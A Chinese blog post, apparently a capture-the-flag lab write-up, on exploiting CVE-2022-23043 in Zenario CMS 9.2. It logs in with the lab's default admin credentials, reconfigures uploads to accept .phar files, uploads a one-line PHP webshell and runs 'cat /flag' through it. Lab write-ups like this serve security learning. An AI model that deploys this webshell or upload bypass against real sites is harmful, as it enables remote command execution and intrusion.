春秋云镜 CVE-2022-23043

最新推荐文章于 2024-09-06 08:41:31 发布
最新推荐文章于 2024-09-06 08:41:31 发布
阅读量201 收藏 1
点赞数 1
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131709164
版权

春秋云镜 CVE-2022-23043 Zenario CMS 9.2 文件上传漏洞

靶标介绍

Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12

启动场景

在这里插入图片描述

漏洞利用

/admin进入管理后台,admin/adminqwe12登陆成功。

在这里插入图片描述
修改文档存放位置为/tmp(否则无法getshell)
在这里插入图片描述
修改上传文件格式,Extension设置为phar,MIME Type设置为 text/plain。
在这里插入图片描述
在这里插入图片描述
“Documents”处上传webshell
在这里插入图片描述
webshell

<?php
system($_GET[cmd]);
phpinfo();
?>

访问类型选择Public
在这里插入图片描述
获取webshell地址“Actions” - “View public link”。
在这里插入图片描述
http://39.106.48.123:17975/public/downloads/bx40a/shell.phar
在这里插入图片描述

http://39.106.48.123:17975/public/downloads/bx40a/shell.phar?cmd=cat%20/flag
在这里插入图片描述
得到flag

flag{c4b38083-0157-4171-8b48-30c1b448b81c}

isbug0
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件上传漏洞CVE-2022-23043
Battery的博客
11-21 11万+
CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传攻击者可以利用这个漏洞上传webshell执行任意命令。利用这个漏洞攻击者暂无特定情况。要利用此漏洞攻击者首先需要访问Zenario CMS的管理后台并通过使用弱口令“admin/adminqwe12”进行登录。
春秋云境:CVE-2022-23043
一只爱吃橙子的羊
12-13 1035
Zenario CMS 9.2 文件上传漏洞攻击者上传webshell执行任意命令登陆信息admin/adminqwe12
[春秋云镜]CVE-2022-23043
niubi707的博客
12-04 5812
CVE-2022-23043Zenario CMS 9.2 文件上传漏洞攻击者上传webshell执行任意命令登陆信息admin/adminqwe12
春秋云镜 CVE-2022-4230
qq274575499的博客
05-07 1474
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云镜 CVE-2022-22947
qq_22002773的博客
07-18 413
春秋云镜 CVE-2022-22947
春秋云镜 CVE-2022-0788
qq_22002773的博客
08-27 474
春秋云镜 CVE-2022-0788
春秋云镜 CVE-2022-0543
qq_22002773的博客
07-26 189
春秋云镜 CVE-2022-0543
春秋云镜CVE-2022-25411
风依旧的博客
05-16 396
春秋云镜CVE-2022-25411,通过搜索引擎得到上传文件路径/admin/files,将cookie修改为正确口令得到的cookie,发现能成功进入上传页面。如果出现404,就是数据包中缺失index.php路径,自行添加即可。思路是对的,但是admin/admin888依然返回302,将口令带入重放器中尝试。通过搜索引擎,得到/admin/options为登录页面,尝试进入登录页面。尝试上传图片,上传成功。
春秋云镜 CVE-2022-22909
qq_22002773的博客
07-19 256
春秋云镜 CVE-2022-22909
春秋云镜 CVE-2022-24223
qq_22002773的博客
07-08 258
春秋云镜 CVE-2022-24223
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 245
个人记录(新手小白)春秋云镜CVE的复现过程
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的...
【盖世汽车-注册安全分析报告】
09-02 1350
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
网络安全宗旨和目标
网络研究观
09-02 671
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
最新发布
文件数据安全交换
09-06 656
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
架构设计(13)安全架构设计理论
追赶时代的博客
09-01 1623
信息安全的架构设计,比如网络安全设计,数据库安全设计
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 1283
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值